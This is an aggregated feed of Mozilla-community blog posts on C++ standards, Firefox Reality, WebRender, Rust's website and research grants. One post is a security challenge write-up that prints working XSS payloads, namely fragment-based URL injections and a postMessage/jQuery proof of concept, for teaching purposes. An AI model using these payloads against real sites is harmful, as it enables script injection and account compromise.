Other Study Groups that met at this meeting include:

  • SG 6 (Numerics), which met for about a day and a half and reviewed a dozen or so proposals
  • SG 12 (Undefined and Unspecified Behaviour), which met both on its own (largely to discuss Contracts) and in joint session with WG23 – Software Vulnerabilities (where the focus was on vulnerabilities related to control structures)
  • SG 16 (Unicode), for which this was the first in-person meeting. The group approved a set of high-level priorities in addition to reviewing several specific proposals.

Freestanding Implementations

Not a study group, but this didn’t really fit anywhere else: there was an evening session to try to clarify the committee’s approach to freestanding implementations.

Freestanding implementations are, roughly speaking, those which cannot assume the presence of a full complement of operating system services, because they’re e.g. targeting kernel code or other “bare metal” scenarios; such implementations cannot practically make use of all language features, such as exceptions.

The standard currently defines a subset of the library that is intended to be supported on freestanding implementations, but defines no such subset for the language. Attempts to define such a subset tend to be stymied by the fact that different environments have different constraints, so one subset does not fit all.

The session didn’t reach any firm conclusions, but one possible direction is to avoid trying to define subsets, and instead make it easier for target environments to not use features of the language that are not applicable or practical for it.

New Study Groups

Two new Study Groups were announced at this meeting. Quoting their charters from Herb Sutter’s trip report:

SG 19 (Machine Learning):

We feel we can leverage C++’s strengths in generic programming, optimization and acceleration, as well as code portability, for the specific domain of Machine Learning. The aim of SG19 is to address and improve on C++’s ability to support fast iteration, better support for array, matrix, linear algebra, in memory passing of data for computation, scaling, and graphing, as well as optimization for graph programming.

SG 20 (Education):

We feel we have an opportunity to improve the quality of C++ education, to help software developers correctly use our language and ecosystem to write correct, maintainable, and performing software. SG20 aims to create curriculum guidelines for various levels of expertise and application domains, and to stimulate WG21 paper writers to include advise on how to teach the new feature they are proposing to add to the standard.

Next Meetings

The next meeting of the Committee will be in Kona, Hawaii, the week of February 18th, 2019.

Conclusion

C++ standards development continues to progress at an unprecedented pace. My highlights for this meeting included:

  • Modules gaining design approval to go into C++20
  • Abbreviated function templates reaching consensus, to round out Concepts in C++20
  • Ranges being voted into the C++20 working draft
  • Coroutines continuing to progress towards a unified design that can hopefully achieve consensus

With the big-ticket items above, not to mention Contracts, operator spaceship, and many other goodies, C++20 is shaping up to be a very impressive release!

Due to the sheer number of proposals, there is a lot I didn’t cover in this post; if you’re curious about a specific proposal that I didn’t mention, please feel free to ask about it in the comments.

Other Trip Reports

In addition to Herb’s, other trip reports about this meeting include Corentin Jabot’s, a collaborative Reddit report, and a podcast focused on Library Evolution by Ashley Hedberg. I encourage you to check them out as well!

Mark CôtéA Tale of Two Commits

I’ve discussed and linked to articles about the advantages of splitting patches into small pieces to the point that I don’t feel the need to reiterate it here. This is a common approach at Mozilla, especially (but not just) in Firefox engineering, something the Engineering Workflow group is always keeping in mind when planning changes and improvements to tools and processes. Many Mozilla engineers have a particular approach to working with small diffs, something, I’ve realized over time, that seems to be pretty uncommon in the industry: the stacking of commits together in a logical series that solves a particular problem or implements a specific feature.

Mozilla VR BlogFirefox Reality update supports 360 videos and 7 additional languages

Firefox Reality update supports 360 videos and 7 additional languages

Firefox Reality 1.1 is now available for download in the Viveport, Oculus, and Daydream app stores. This release includes some major new features, including localization to seven new languages (including voice search support), a new dedicated theater viewing mode, bookmarks, 360 video support, and significant improvements to the performance and quality of our user interface.

We also continue to expand the Firefox Reality content feed, and are excited to add cult director/designer Keiichi Matsuda’s video series, including his latest creation, Merger.

Keiichi’s work explores how emerging technologies will impact everyday life in the future. His acclaimed 2016 film HYPER-REALITY was a viral success, presenting a provocative and kaleidoscopic vision of the future city saturated in media. It was an extension and re-imagining of his earlier concept films made in 2010, also presented here. His new short film, Merger, is shot in 360 and explores the future of work, automated corporations and the cult of productivity. We follow an elite tele-operator fighting for her economic survival, in search of the ultimate interface.

New Features:

  • Improved theater mode with 360 video playback support
  • Additional localization: Chinese (Mandarin - simplified and traditional), French, Italian, German, Spanish, Japanese, Korean
  • Expanded voice search support to new localized languages above
  • Bookmarks
  • Automatic search and domain suggestions in URL bar

Improvements/Bug Fixes:

  • Improved 2D UI performance

Full release notes can be found in our GitHub repo here.

Looking ahead, we are exploring content sharing and syncing across browsers (including bookmarks), multiple windows, tab support, as well as continuing to invest in baseline features like performance. We appreciate your ongoing feedback and suggestions — please keep it coming!

Firefox Reality is available right now.

Download for Oculus
(supports Oculus Go)

Download for Daydream
(supports all-in-one devices)

Download for Viveport (Search for “Firefox Reality” in Viveport store)
(supports all-in-one devices running VIVE Wave)

Mozilla B-Teamhappy bmo push day!

happy bmo push day!

We did another release today.

release tag

the following changes have been pushed to bugzilla.mozilla.org:

  • [1510427] improve fulltext completion for real names
  • [1508261] Closing DevRel sponsorship form on Bugzilla and updating Wiki page
  • [1508385] Remove links to input.mozilla.org from Guided Bug Entry flow
  • [1510653] API method for returning users profile information when given a valid oauth2…

View On WordPress

Daniel PocockConnecting software freedom and human rights

2018 is the 70th anniversary of the Universal Declaration of Human Rights.

Over the last few days, while attending the UN Forum on Business and Human Rights, I've had various discussions with people about the relationship between software freedom, business and human rights.

In the information age, control of the software, source code and data translates into power and may contribute to inequality. Free software principles are not simply about the cost of the software, they lead to transparency and give people infinitely more choices.

Many people in the free software community have taken a particular interest in privacy, which is Article 12 in the declaration. The modern Internet challenges this right, while projects like TAILS and Tor Browser help to protect it. The UN's 70th anniversary slogan Stand up 4 human rights is a call to help those around us understand these problems and make effective use of the solutions.

We live in a time when human rights face serious challenges. Consider censorship: Saudi Arabia is accused of complicity in the disappearance of columnist Jamal Khashoggi and the White House is accused of using fake allegations to try and banish CNN journalist Jim Acosta. Arjen Kamphuis, co-author of Information Security for Journalists, vanished in mysterious circumstances. The last time I saw Arjen was at OSCAL'18 in Tirana.

For many of us, events like these may leave us feeling powerless. Nothing could be further from the truth. Standing up for human rights starts with looking at our own failures, both as individuals and organizations. For example, have we ever taken offense at something, judged somebody or rushed to make accusations without taking time to check facts and consider all sides of the story? Have we seen somebody we know treated unfairly and remained silent? Sometimes it may be desirable to speak out publicly, sometimes a difficult situation can be resolved by speaking to the person directly or having a meeting with them.

Being at the United Nations provided an acute reminder of these principles. In parallel to the event, the UN was hosting a conference on the mine ban treaty and a conference on Afghanistan, with the Afghan president arriving as I walked up the corridor. These events reflect a legacy of hostilities and sincere efforts to come back from the brink.

A wide range of discussions and meetings

There were many opportunities to have discussions with people from all the groups present. Several sessions raised issues that made me reflect on the relationship between corporations and the free software community and the risks for volunteers. At the end of the forum I had a brief discussion with Dante Pesce, Chair of the UN's Business and Human Rights working group.

Best free software resources for human rights?

Many people at the forum asked me how to get started with free software and I promised to keep adding to my blog. What would you regard as the best online resources, including videos and guides, for people with an interest in human rights to get started with free software, solving problems with privacy and equality? Please share them on the Libre Planet mailing list.

Let's not forget animal rights too

Are dogs entitled to danger pay when protecting heads of state?

The Firefox FrontierHow to Use Firefox Reality on the Oculus Go VR Headset

Virtual reality headsets are one of the hottest gifts of the season, but without an internet browser built for virtual reality the experience could fall flat. Enter, Firefox Reality, an … Read more

The post How to Use Firefox Reality on the Oculus Go VR Headset appeared first on The Firefox Frontier.

Mozilla B-Teamhappy bmo push days

a whole bunch of updates (including last week’s)

Last week’s pushes didn’t get posted because we had a few bug fixes, so below is yesterday’s push + last week’s, in reverse chronological order.

release tag

the following changes have been pushed to bugzilla.mozilla.org:

  • [1484892] Modify EditComments extension to let anyone use it conditionally and support inline editing
  • [1354589] Implement OAuth2 on BMO
  • [1452018] Remove remaining Firefox OS and…

View On WordPress

Mozilla Open Innovation TeamPrototyping with Intention

In our first post of this series we introduced why, and a bit of how, we’re applying experience design to our Open Innovation projects and community collaboration. An integral part of experience design is growing an idea from a concept to a full-fledged product or service. In getting from one to the other, thinking and acting prototypically can make a significant difference in overall quality and set us up for early, consistent feedback. We are then able to continually identify new questions and test our hypotheses with incremental work. So, what do we actually mean by thinking and acting prototypically?

<figcaption>Common Voice started as a proof of concept prototype and has been collaboratively iterated over the past year</figcaption>

Be Open to Change

At the start of any project our Open Innovation team develops concepts with the intention that things will change. Whether it be wireframe prototypes or coded experiments, iteration is inevitable. First ideas are often far from perfect; it’s with help from new or returning contributors and collaborating project teams that we’re able to refine initial ideas more readily and efficiently. How? Through feedback loops designed with tools such as Discourse, GitHub, contact forms, on-site surveys and remote testing. Our overall goal: release assumptions early and learn from those engaging with the concept. In this way we set our experiences up for incremental, data-influenced iteration.

<figcaption>Workshop paper prototypes became coded production prototypes over a 6 week stretch</figcaption>

To continue with our example of Common Voice, we see that this approach was applied in moving from paper prototype to first production prototype. The learnings and feedback from the design sprint exercises helped us realize the need for storytelling and a human interaction experience that would resonate with, well, humans. To achieve this we set out over a 6-week phase to create the experience via wireframes, basic UI design and code implementation. With the help of our community members we were thankfully able to QA the experience as we released it.

Iterate Consistently and Incrementally

With a working prototype out in the wild our team sets their focus on observing and gathering info about performance and usability. In addition to the 250+ technical contributors who file issues with feature requests and bug fixes for Common Voice, our team made time to evaluate the prototype from a usability perspective.

<figcaption>The Common Voice GitHub repository is a hub of collaboration between contributors and Mozilla staff</figcaption>

About three months in we performed a UX assessment, reviewing the initial prototype designs against what actually made it to production code. Comparing this against feature requests from product stakeholders and contributors, our experience design goal was to understand which changes were most needed to improve usability and engagement across the site.

This assessment information, combined with usability testing, supported decisions for improvements such as:

  1. Adding keyboard shortcuts to the contribution experience
  2. Improving prompts and progress counters when recording and listening to sentences
  3. Moving site navigation from the sidebar to a top header
  4. Optimizing for responsiveness across viewports
  5. Providing clear calls to action for contribution on the homepage

<figcaption>The next iteration of the MVP prototype based on usability feedback and contributor feature requests</figcaption>

Workshop New Questions

Completing the incremental work allows us to find our way to new questions and needs as a product or service evolves. Along with the feature requests and smaller production needs required of a live prototype, there are larger project strategy questions that come to light. These are the types of questions you can only answer by experimenting.

Releasing our first dataset for Common Voice was the result of one such experiment. An achievement in itself, it also proved that our concept had merit. The prototype was working! At the same time, it highlighted quality gaps in our data: it could be more spontaneous, closer to the way two humans naturally converse. It also reaffirmed something we already knew: our data could be far more diverse, meaning more gender, accent, dialect and overall language diversity. There is an increasing need for a large, publicly open multi-language voice dataset; this has been clear from the start of this project. True to our desire to think and act prototypically, we had to choose a single language to focus resources and first prove out the concept. With the successful release of the first dataset we were ready to take on some new questions and keep iterating:

  1. How might we enable a multi-language experience?
  2. How might we increase the quantity and quality of our contributions?

Having already gained integral insights for Common Voice via an experience workshop, we planned another. In January of 2018 we brought together commercial and academic partners to join Mozilla team members, including various expert influencers, to help brainstorm and ideate potential solutions for these questions. The common interest of the attendees? Seeing this unique project succeed. Many had come up against these types of questions in different contexts across their work and were keen to ideate on ways to improve the site.

<figcaption>Multi-language experience wireframes result from a collaborative experience journey and feature prioritization</figcaption>

Workshopping the first question meant determining requirements (what does success look like?) and mapping experience journeys to achieve those requirements (see the above image). What resulted was this realization: we have big, multi-feature dreams for the overall Common Voice multi-language experience. To make those dreams a reality we focused first on what was most needed: providing people a way to contribute in their desired language(s). Other features, like building dedicated language pages and creating a community dashboard, are built into our roadmap. This feature prioritization enabled us to deliver a multi-language experience in May of this year. Reaching this milestone has made the second Common Voice dataset release — which will be our first multi-language dataset release — achievable by the end of 2018.

<figcaption>Workshop session on how we might increase the quantity and quality of voice contributions for Common Voice</figcaption>

In the area of increasing quantity and quality of contributions, the workshop introduced concepts for improving spontaneous speech capture through potential, future experiments. Some examples include enabling spontaneous, conversational style recording sessions on the website; integrations with existing wearables for set session lengths; and a roaming event pop-up with recording booths. This ideation session even lingered in our minds well past the workshop and has prompted thoughts around an opt-in style recording space in collaboration with Hubs, a virtual spaces experiment by Mozilla’s Mixed Reality team.

<figcaption>Relaunched in August 2018 as a portal, the contribution experience is now multi-language enabled</figcaption>

For the current online experience we solidified user journeys that delivered immediate impact on the website and began laying the foundation for more robust future experiments. Some of these, such as the new contribution experience and homepage, we’ve already seen land in production as iterations of the Common Voice MVP prototype. Other feature enhancements, like a new profile login experience — which enables contributors to save their progress across multiple languages and view that progress via a new dashboard — have launched this week and are undergoing collaborative QA with our communities. The goal of these features is to improve the human experience while increasing the quality and quantity of voice contributions.

<figcaption>Prototyping continues with the new stat dashboard for Common Voice</figcaption>

With Common Voice, incremental, open iteration has allowed our team to intentionally grow the project from the early prototype. In doing so we are actively working to create more avenues for contribution regardless of language, device or location. Our next post will take a deeper look at how we’re empowering contributions of all sizes, in Common Voice and elsewhere, for Open Innovation.


Prototyping with Intention was originally published in Mozilla Open Innovation on Medium, where people are continuing the conversation by highlighting and responding to this story.

Mozilla B-Teamhappy bmo push day!

happy bmo push day!

release tag

the following changes have been pushed to bugzilla.mozilla.org:

  • [1505793] Add triage owner in /rest/bug
  • [1506754] Group Membership report “include disabled users” doesn’t seem to work
  • [1328665] Two issues with Project Review form for RRAs
  • [1505050] make the request nagging script more robust
  • [1504325] Mozilla Gear Request form broken: The requested format gear does not exist with a…

View On WordPress

Mozilla GFXWebRender newsletter #32

Hey there! Did you hear this? Me neither. The 32nd episode of WebRender’s newsletter made its way to your screen without a sound. In the previous episode, nic4r asked a lot of interesting technical questions in the comments section. There is a lot to cover, so I’ll start by answering a couple here by way of introduction and will go through the other questions in later posts.

How do the strategies for OMTP and WebRender relate? Would OMTP have benefits for expensive blob rasterization since that used Skia?

OMTP, short for off-main-thread painting, is a project completely separate from WebRender that was implemented by Ryan. Without WebRender, painting used to happen on the main thread (the thread that runs the JS event loop). Since this thread is often the busiest, moving work such as painting out of it is a nice win on multi-core processors: the main thread gets back to working on JS more quickly while painting is carried out in parallel. This work is pretty much done now and Ryan is working on project Fission.

What about WebRender? WebRender moved all painting off of the main thread by default. The main thread translates Gecko’s displaylist into a WebRender displaylist, which is sent to the GPU process, and the latter renders everything. So WebRender and OMTP, while independent projects, both fulfill the goal of OMTP, which was to remove painting work from the main thread. OMTP can be seen as a very nice performance win while waiting for WebRender.

Expensive blob rasterization is already carried out asynchronously by the scene builder thread (helped by a thread pool), which means blob rasterization gets the same property that OMTP provides. This is a good segue to another question:

How do APZ and async scene building tie together?

APZ (for Asynchronous Panning and Zooming) refers to how we organize the rendering architecture in such a way that panning and zooming can happen at a frame rate that is decoupled from the expensive parts of the rendering pipeline. This is important because the perceived performance of the browser largely relies on quickly and smoothly reacting to some basic interactions such as scrolling.

With WebRender there are some operations that can cost more than our frame budget such as scene building and blob image rasterization. In order to keep the nice and smooth feel of APZ we made these asynchronous. In practice this means that when layout changes happen, we re-build the scene and perform the rasterization of blob images on the side while still responding to input events so that we can continue scrolling the previous version of the scene until the new one is ready. I hope this answers the question. Async scene building is one of the ways we “preserve APZ” so to speak with WebRender.

Notable WebRender and Gecko changes

  • Jeff improved performance when rendering text by caching nsFontMetrics references.
  • Jeff removed some heap allocations when creating clip chains.
  • Jeff wrote a tool to find large memcpys generated by rustc.
  • Dan continued working on scene building performance.
  • Kats is helping with the AMI upgrade for Windows.
  • Kats fixed crashes due to large draw target allocations.
  • Kats got captures to work on Android.
  • Kvark removed the non-zero origin of reference frames, stacking contexts and iframes.
  • Kvark made a couple of memcpy optimizations.
  • Kvark fixed replaying a release capture with a debug version of wrench.
  • Kvark prevented tiled blob images from making captures unusable.
  • Matt improved the performance of displaylist building.
  • Andrew fixed a rendering issue with animated images.
  • Andrew fixed a crash.
  • Glenn landed all of the primitive interning and picture caching patches, and will probably enable picture caching soon. (1), (2), (3), (4), (5), (6), (8), (9) and (10). Phew!
  • Glenn added a scratch buffer for transient data during frame building.
  • Glenn reduced the size of BrushPrimitive.
  • Glenn added support for float keys in interning.
  • Glenn fixed a bug with the update of uv rects in the texture cache.
  • Nical and Gankro simplified tracking image dirty rects in WebRender.
  • Nical stored tile dirty rects in local space.
  • Nical refactored the blob image related APIs to be able to express some of the things we need for blob image re-coordination.
  • Nical fixed a crash.
  • Nical fixed a memory leak.
  • Sotaro fixed a WebGL crash when Wayland is enabled.
  • Sotaro fixed a rendering issue with SurfaceTexture on Android.
  • Sotaro fixed an intermittent failure related to frame synchronization.
  • Doug put document splitting up for review.

Ongoing work

  • Bobby is working on improving the shader cache.
  • Nical is working on blob image re-coordination.
  • A lot of people in the team keep investigating performance with a focus on scene building and slow memcpys generated by rustc when medium/large structures are moved on the stack.
  • Kats keeps improving the situation on Android.
  • Lee continues improving font rendering.
  • Markus is getting profiling with full symbol information to work on Android.

Enabling WebRender in Firefox Nightly

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.
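
If you prefer managing prefs in a user.js file rather than flipping them in about:config, the same toggle can be expressed there. This is only a sketch, assuming the standard user.js mechanism in your Firefox profile directory; the pref name is the one given above:

// user.js in the Firefox profile directory (equivalent to the about:config step above).
// WebRender is enabled after the next restart.
user_pref("gfx.webrender.all", true);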

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

The Firefox FrontierFirefox fights for you

It’s been a year here on the internet, to say the least. We’ve landed in a place where misinformation—something we fought hard to combat—is the word of the year, where … Read more

The post Firefox fights for you appeared first on The Firefox Frontier.

The Rust Programming Language BlogA new look for rust-lang.org

Before 1.0, Rust had a reputation for changing the language on a near-daily basis. By contrast, the website has looked pretty much the same. Here’s the first version of rust-lang.org, seven years ago (courtesy of the WayBack Machine):

rust website in 2011

In 2014, three years later:

rust website in 2014

If you visit https://rust-lang.org today, you'll see this:

rust website in 2018

Over time, we’ve grown to love it. It’s simple. Minimal. Familiar.

Improving the content

But we can always do better. For example, the website suffers from what we call “the fireflower problem.” First formulated by Kathy Sierra, and made into an image by Samuel Hulick:

the fireflower

We want Mario to use Rust, the fireflower, and turn into the ever-awesome Fire Mario. But there’s a corollary here: it’s better to say “we will make you into Fire Mario” than it is “we sell fire flowers.”

(As an aside, we had a community discussion on this topic back in 2016.)

In other words, this list:

  • zero-cost abstractions
  • move semantics
  • guaranteed memory safety
  • threads without data races
  • trait-based generics
  • pattern matching
  • type inference
  • minimal runtime
  • efficient C bindings

doesn’t explain what you can do with Rust, which leads people to say “Rust seems neat, but I don’t know what I would actually use it for.”

Improving the style

We also like the minimalist style of the current site, but it may be too minimal. Furthermore, it has no room to grow; we have more than just rust-lang.org these days. We wanted a style that we could use to unify all of the websites that we maintain in the Rust project; crates.io being a big one. Its “pool table” design feels extremely different from rust-lang.org, which is confusing.

Doing this requires care, as we don’t want to make the website huge and complicated, but at the same time, using more than black and blue might be nice.

The beta

Today, we’d like to announce a beta of the new rust-lang.org. If you go to https://beta.rust-lang.org, you’ll see this:

beta rust website

Its fresh visual design gives us a lot more flexibility in how we get information across. It retains the minimalist spirit of the old site, while adding some bold color and visual variety.

We hope you like it as much as we do!

Some highlights

The new site puts the “why Rust?” question front-and-center, and includes dedicated pages for the four application domains we targeted in 2018:

  • Embedded devices
  • WebAssembly
  • CLI apps
  • Network services

We have also revised the slogan. Historically, it has been:

Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety.

Like the bullet list of features, this doesn't convey what you can do with Rust. So we've updated the slogan:

Rust: The programming language that empowers everyone to become a systems programmer.

We're still not sure we love the term "systems programming," as it seems like it means something different to everyone, but this iteration is significantly better than the old one. Even if people have different ideas about what "systems programming" means, they at least have some idea. "guarantees thread safety," not so much.

Future work

There’s still more work to do:

  • Some information on the old site has not yet been ported over.
  • Translations have regressed. We’re working on adding the proper infrastructure here, and hope to be able to start accepting translations by the end of the year.
  • We need more polish and testing in a general sense.

Please file an issue with any feedback you have! We’re also looking for people with abilities of all kinds to help maintain the site, and especially people with design, CSS, and marketing skills. If you’d like to get involved, please email us!

We’d like to ship this new site on December 6, with the release of Rust 2018. Thank you for giving it a try before then, so we can work out any bugs we find!

The Mozilla BlogMozilla Funds Research Grants in Four Areas

We’re happy to announce the recipients for the 2018 H2 round of Mozilla Research Grants. In this tightly focused round, we awarded grants to support research in four areas: Web of Things, Core Web Technologies, Voice/Language/Speech, and Mixed Reality. These projects support Mozilla’s mission to ensure the Internet is a global public resource, open and accessible to all.

Web of Things

We are funding the University of Washington to support Assistant Professor of Interaction Design Audrey Desjardins in the School of Art + Art History + Design. Her project, titled (In)Visible Data: How home dwellers engage with domestic Web of Things data, will provide a detailed qualitative description of current practices of data engagement with the Web of Things in the home, and offer an exploration of novel areas of interest that are diverse, personal, and meaningful for future WoT data in the home.

Core Web Technologies

Mozilla has been deeply involved in creating and releasing AV1: an open and royalty-free video encoding format. We are funding the Department of Control and Computer Engineering at Politecnico di Torino. This grant will support the research of Assistant Professor Luca Ardito and his project Algorithms clarity in Rust: advanced rate control and multi-thread support in rav1e. This project aims to understand how the Rust programming language improves the maintainability of code while implementing complex algorithms.

Voice, language and speech

We are funding Indiana University Bloomington to support Suraj Chiplunkar’s project Uncovering Effective Auditory Feedback Methods to Promote Relevance Scanning and Acoustic Interactivity for Users with Visual Impairments. This project explores better ways to allow people to listen to the web. Suraj Chiplunkar is a graduate student in the Human-Computer Interaction Design program as part of the School of Informatics, Computing, and Engineering, and is working with Professor Jeffrey Bardzell.

Mixed Reality

Mozilla has a strong commitment to open standards in virtual and augmented reality, as evidenced by our browser, Firefox Reality. We’re happy to support the work of Assistant Professor Michael Nebeling at the University of Michigan’s School of Information and his project Rethinking the Web Browser as an Augmented Reality Application Delivery Platform. This project explores the possibilities for displaying elements from multiple augmented reality apps at once, pointing the way to a vibrant, open mixed reality ecosystem.

The Mozilla Research Grants program is part of Mozilla’s Emerging Technologies commitment to being a world-class example of inclusive innovation and impact culture, and reflects Mozilla’s commitment to open innovation, continuously exploring new possibilities with and for diverse communities. We plan to open the 2019H1 round in Spring 2019: see our Research Grant webpage for more details and to sign up to be notified when applications open.

Congratulations to all of our applicants!

Thumbnail image by Audrey Desjardins

The post Mozilla Funds Research Grants in Four Areas appeared first on The Mozilla Blog.

The Mozilla BlogA Statement About Facebook and Color of Change

Color of Change is one of the leading civil rights organizations of our time, and we at Mozilla have been immensely privileged to collaborate with them on the Ford-Mozilla Open Web Fellows initiative and on a number of areas around internet health.

Their work is pioneering, inspiring, and has been crucial for representing the voices of a key community in debates about the internet. As a technology community, we need more and diverse voices in the work to make the internet open, accessible, and safe for all.

Recently, some concerning allegations regarding practices by Facebook have been raised in high-profile media coverage, including a New York Times article. We are pleased that Facebook is meeting with Color of Change to discuss these issues. We hope Facebook and Color of Change can identify ways that we, as a tech community, can work together to address the biggest challenges facing the internet.

The post A Statement About Facebook and Color of Change appeared first on The Mozilla Blog.

Wladimir PalantBBN challenge resolutions: "A properly secured parameter" and "Exploiting a static page"

BugBountyNotes is quickly becoming a great resource for security researchers. Their challenges in particular are a fun way of learning ways to exploit vulnerable code. So a month ago I decided to contribute and created two challenges: A properly secured parameter (easy) and Exploiting a static page (medium). Unlike most other challenges, these don’t really have any hidden parts. Pretty much everything going on there is visible, yet exploiting the vulnerabilities still requires some thinking. So if you haven’t looked at these challenges, feel free to stop reading at this point and go try it out. You won’t be able to submit your answer any more, but as both are about exploiting XSS vulnerabilities you will know yourself when you get there. Of course, you can also participate in any of the ongoing challenges.

Still here? Ok, I’m going to explain these challenges then.

What’s up with that parameter?

We’ll start with the easier challenge first, dedicated to all the custom URL parsers that developers seem to be very fond of for some reason. The client-side code makes it very obvious that the “message” parameter is vulnerable. With the parameter value being passed to innerHTML, we would want to pass something like <img src=dummy onerror=alert("xss")> here (note that innerHTML won’t execute <script> tags).

But there is a catch of course. Supposedly, the owners of that page discovered the issue. But instead of putting resources into fixing it, they preferred a quick band-aid and configured a Web Application Firewall to stop attacks. That’s the PHP code emulating the firewall here:

 if (preg_match('/[^\\w\\s-.,&=]/', urldecode($_SERVER['QUERY_STRING'])))
    exit("Invalid parameter value");

The allowed character set here is the bare minimum to allow the “functionality” to work, and I feel really sorry for anybody who tried to solve the challenge by attacking this “firewall.” The only way around this filter is to avoid going through it in the first place.

It might not be immediately obvious but the URL parser used by the challenge is flawed:

      function getParam(name)
      {
        var query = location.href.split("?")[1];
        if (!query)
          return null;

        var params = query.split("&");
        for (var i = 0; i < params.length; i++)
        {
          var parts = params[i].split("=");
          if (parts[0] == name)
            return decodeURIComponent(parts[1]);
        }
        return null;
      }

Do you see the issue? Yes, it assumes that anything following the question mark is the query string. What it forgets about is the fragment part of the URL, the one following the # symbol. Any parameters in the fragment will be parsed as well. This wouldn’t normally be a big deal, but the fragment isn’t sent to the server! This means that no server-side firewall can see it, so it cannot stop attacks coming from this direction.

So here are some URLs that will trigger the XSS vulnerability here:

  • https://www.bugbountytraining.com/challenges/challenge-10.php#?message=%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E
  • https://www.bugbountytraining.com/challenges/challenge-10.php?message=#%3Cimg%20src%3Ddumm%20onerror%3Dalert(%22xss%22)%3E

Of course, answers submitted by BBN users contained quite a few more variations. But what really surprised me was just how many people managed to solve this challenge without understanding how their solution worked. It seems that they attacked the Web Application Firewall blindly and just assumed that the firewall treated the # character specially for some reason.

Let’s close with some advice for all developers out there: don’t write your own URL parser. Even though URL parsing appears simple, there are many pitfalls. If you need to do it, use the URL object. If you need to parse query parameters, use the URLSearchParams object. Even in non-browser environments, there are always well-tested URL parsers already available.
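
As a rough sketch of what that looks like in the browser (the element id here is made up for illustration and is not part of the challenge code):

// Parse only the real query string; the fragment after # is never touched.
function getParamSafe(name)
{
  var params = new URLSearchParams(window.location.search);
  return params.get(name); // null if the parameter is absent
}

// And keep untrusted values out of innerHTML; textContent is safe here.
document.getElementById("output").textContent = getParamSafe("message") || "";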

The long route to exploiting a message handler

The other challenge has no server side whatsoever; it’s merely a static web page. And the issue with that page should also be fairly obvious: it listens to message events. When browsers added the window.postMessage() API as a means of cross-domain communication, the idea was that any recipient would always check event.origin and reject unknown sources. But of course, many websites fail to validate the message sender at all or go for broken validation schemes. It is no different for this challenge.
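
For reference, the kind of sender validation a page should be doing looks roughly like this (a sketch only; the trusted origin is of course made up):

window.addEventListener("message", function(event)
{
  // Reject messages from anyone but the origin we actually expect.
  if (event.origin != "https://trusted.example.com")
    return;

  processMessage(event.data); // hypothetical handler for validated messages
});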

Instead of validating the sender, this page validates the recipient: the recipient stated in the message has to match the page’s window name. Now the window name can be easily set by the attacker, e.g. by setting a name for the frame that this page is loaded into. The difficulty here is that the page will only consider certain recipients as “valid,” namely those where its own Buzhash variant results in 0x70617373 (or as a string: “pass”).

And that hash function is mean: no matter the input, the two bytes in the middle will always be NUL bytes! At least that’s the case as long as you constrain yourself to the ASCII character set. Once you start playing around with Unicode, the desired answer actually becomes possible. A bit of experimentation gives me "\x70\x61\u6161\0\0\0\0\u7373" as a valid recipient. But because NUL bytes in the <iframe name> attribute won’t work, I had to experiment a bit more to find a somewhat less obvious solution: "\x70\x10\x10\x10\x10\u6161\u6100\u7373". Some BBN users solved this issue more elegantly: while NUL bytes in attributes don’t work, using them when setting iframe.name property works just fine. One submission also used Microsoft Z3 theorem prover instead of mere experimentation to find a valid recipient.

Once we managed to get the page to accept our message, what can we do then? Not a lot: we can make the page create a custom event for us. But there are no matching event listeners! That is, until you realize that jQuery’s ajaxSuccess callback is actually a regular event handler. So we can trigger that callback.

But the callback merely sets element text; it doesn’t use innerHTML or its jQuery equivalent. So not vulnerable? Indeed, setting text is unproblematic. But this code selecting the element is:

$(data.selector)

The jQuery constructor is typically called with a selector. However, it supports a large number of different calling conventions. In particular, it (and many other jQuery methods) can be called with HTML code as a parameter. This can lead to very non-obvious security issues, as I pointed out a few years ago. Here, passing some HTML code as the “selector” will allow the attacker to run JavaScript code.
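
In isolation, the dangerous pattern boils down to something like this (just a sketch; the alert payload is a stand-in for arbitrary attacker code):

// jQuery happily parses HTML where a selector is expected, creating the
// <img> element; its invalid src then fires the inline onerror handler.
$('<img src=x onerror=alert(document.domain)>');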

Here is my complete solution:

<script>
  window.onload = function()
  {
    var frame = document.getElementById("frame");
    frame.contentWindow.postMessage({
      type: "forward",
      event: "ajaxSuccess",
      selector: "<img src=x onerror=alert(document.domain)>",
      recipient: "\x70\x10\x10\x10\x10\u6161\u6100\u7373"
    }, "*");
  };
</script>
<iframe id="frame" src="https://www.bugbountytraining.com/challenges/challenge-8.html" name="&#x70;&#x10;&#x10;&#x10;&#x10;&#x6161;&#x6100;&#x7373;"></iframe>

This is only one way of demonstrating the issue of course, and some of the submissions from BBN users were more elegant than what I came up with myself.

Robert O'CallahanCapitalism, Competition And Microsoft Antitrust Action

Kevin Williamson writes an ode to the benefits of competition and capitalism, one of his themes being the changing fortunes of Apple and Microsoft over the last two decades. I'm mostly sympathetic, but in a hurry to decry "government intervention in and regulation of the part of our economy that is, at the moment, working best", he forgets or neglects to mention the antitrust actions brought by the US government against Microsoft in the mid-to-late 1990s. Without those actions, there is a high chance things could have turned out very differently for Apple. At the very least, we do not know what would have happened without those actions, and no-one should use the Apple/Microsoft rivalry as an example of glorious laissez-faire capitalism that negates the arguments of those calling for antitrust action today.

Would Microsoft have invested $150M to save Apple in 1997 if they hadn't been under antitrust pressure since 1992? In 1994 Microsoft settled with the Department of Justice, agreeing to refrain from tying the sale of other Microsoft products to the sale of Windows. It is reasonable to assume that the demise of Apple, Microsoft's only significant competitor in desktop computer operating systems, would have increased the antitrust scrutiny on Microsoft. At that point Microsoft's market cap was $150B vs Apple's $2B, so $150M seems like a cheap and low-risk investment by Gates to keep the US government off his back. I do not know of any other rational justification for that investment. Without it, Apple would very likely have gone bankrupt.

